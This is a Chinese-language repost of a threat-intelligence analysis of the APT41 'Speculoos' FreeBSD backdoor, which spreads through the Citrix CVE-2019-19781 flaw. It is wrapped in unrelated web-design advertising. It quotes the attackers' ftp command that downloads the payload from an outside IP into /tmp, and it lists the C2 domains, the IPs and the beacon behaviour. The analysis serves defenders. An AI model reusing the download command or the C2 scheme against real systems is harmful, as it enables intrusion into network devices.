這篇文章將為大家詳細(xì)講解有關(guān)如何進(jìn)行APT41 Speculoos后門分析，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

為海勃灣等地區(qū)用戶提供了全套網(wǎng)頁(yè)設(shè)計(jì)制作服務(wù)，及海勃灣網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為成都做網(wǎng)站、成都網(wǎng)站制作、成都外貿(mào)網(wǎng)站建設(shè)、海勃灣網(wǎng)站設(shè)計(jì)，以傳統(tǒng)方式定制建設(shè)網(wǎng)站，并提供域名空間備案等一條龍服務(wù)，秉承以專業(yè)、用心的態(tài)度為用戶提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶的要求，就會(huì)得到認(rèn)可，從而選擇與我們長(zhǎng)期合作。這樣，我們也可以走得更遠(yuǎn)！

2020年3月25日，F(xiàn)ireEye發(fā)表了APT41全球攻擊活動(dòng)報(bào)告。此攻擊活動(dòng)發(fā)生在1月20日至3月11日期間，主要對(duì)Citrix，Cisco和Zoho網(wǎng)絡(luò)設(shè)備進(jìn)行攻擊。研究人員根據(jù)WildFire和AutoFocus數(shù)據(jù)獲得了針對(duì)Citrix設(shè)備的攻擊樣本‘Speculoos’，還確定了北美，南美和歐洲等世界各地多個(gè)行業(yè)的受害者。

Speculoos的基于FreeBSD實(shí)現(xiàn)的，共識(shí)別出五個(gè)樣本，所有樣本文件大小基本相同，樣本集之間存在微小差異。Speculoos利用CVE-2019-19781進(jìn)行攻擊傳播，CVE-2019-19781影響Citrix Application Delivery Controller，Citrix Gateway和Citrix SD-WAN WANOP等設(shè)備，允許攻擊者遠(yuǎn)程執(zhí)行任意命令。

攻擊細(xì)節(jié)

攻擊者利用CVE-2019-19781遠(yuǎn)程執(zhí)行命令：'/usr/bin/ftp -o /tmp/bsd ftp://test：[redacted]\@ 66.42.98[.]220/<filename>'。

第一波攻擊始于2020年1月31日晚上，使用的文件名為bsd，影響了美國(guó)的多個(gè)高等教育機(jī)構(gòu)，美國(guó)醫(yī)療機(jī)構(gòu)和愛爾蘭咨詢公司。第二波攻擊始于2020年2月24日，使用文件名為un，影響了哥倫比亞高等教育機(jī)構(gòu)，奧地利制造組織，美國(guó)高等教育機(jī)構(gòu)以及美國(guó)的州政府。

基于BSD系統(tǒng)的惡意軟件相對(duì)少見，此工具和特定Citrix網(wǎng)絡(luò)設(shè)備有關(guān)，因此Speculoos很可能是APT41組織專為此攻擊活動(dòng)研發(fā)的。

二進(jìn)制分析

Speculoos后門是使用GCC 4.2.1編譯的ELF可執(zhí)行文件，可在FreeBSD系統(tǒng)上運(yùn)行。 該負(fù)載無法保持持對(duì)目標(biāo)持久控制，因此攻擊者會(huì)使用額外的組件或其他攻擊手段維持控制。 后門執(zhí)行后將進(jìn)入循環(huán)，該循環(huán)調(diào)用函數(shù)通過443端口與C2域進(jìn)行通信：

alibaba.zzux[.]com (119.28.139[.]120)

如果無法通信，Speculoos會(huì)嘗試通過443端口與119.28.139[.]20上的備份C2通信。如果連接到任一C2服務(wù)器，它將與服務(wù)器進(jìn)行TLS握手。 圖1顯示了發(fā)送到C2服務(wù)器的數(shù)據(jù)包。

它請(qǐng)求login.live [.] com作為Server Name Indication（SNI）。

成功連接到C2并完成TLS握手后，Speculoos將對(duì)目標(biāo)系統(tǒng)進(jìn)行指紋識(shí)別，并將數(shù)據(jù)發(fā)送回C2服務(wù)器。其結(jié)構(gòu)如下表1所示。

數(shù)據(jù)通過TLS通道發(fā)送，并且Speculoos會(huì)等待服務(wù)器的兩字節(jié)響應(yīng)。 收到響應(yīng)后，它將向C2發(fā)送一個(gè)字節(jié)（0xa），并進(jìn)入循環(huán)等待命令。 表2為攻擊者可執(zhí)行命令， 可讓攻擊者完全控制受害者系統(tǒng)。

研究中分析的兩個(gè)Speculoos樣本在功能上相同，兩者之間只有八個(gè)字節(jié)不同，在收集系統(tǒng)信息時(shí)‘hostname‘和‘uname -s’命令不同導(dǎo)致。uname -s返回內(nèi)核信息，hostname返回主機(jī)系統(tǒng)名稱。 下圖顯示了兩個(gè)Speculoos樣本之間的二進(jìn)制比較。

影響評(píng)估

互聯(lián)網(wǎng)可訪問設(shè)備允許未經(jīng)授權(quán)的用戶遠(yuǎn)程執(zhí)行代會(huì)帶來很大的安全問題，CVE-2019-19781影響了多個(gè)面向互聯(lián)網(wǎng)的設(shè)備，攻擊者積極利用此漏洞來安裝自定義后門。受影響組織大量的網(wǎng)絡(luò)活動(dòng)都必須經(jīng)過這些網(wǎng)絡(luò)設(shè)備，攻擊者可以監(jiān)視或修改整個(gè)組織的網(wǎng)絡(luò)活動(dòng)。

默認(rèn)情況下通過這些設(shè)備可以直接訪問組織系統(tǒng)內(nèi)部，攻擊者無需考慮內(nèi)部網(wǎng)絡(luò)橫向移動(dòng)的問題。攻擊者可以修改網(wǎng)絡(luò)流量，注入惡意代碼，執(zhí)行中間人攻擊，或?qū)⒂脩糁囟ㄏ虻教摷俚卿涰?yè)面來收集登錄憑證。

關(guān)于如何進(jìn)行APT41 Speculoos后門分析就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。

文章名稱：如何進(jìn)行APT41Speculoos后門分析
文章鏈接：http://aaarwkj.com/article44/igihee.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供標(biāo)簽優(yōu)化、網(wǎng)站內(nèi)鏈、全網(wǎng)營(yíng)銷推廣、外貿(mào)建站、Google、微信公眾號(hào)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)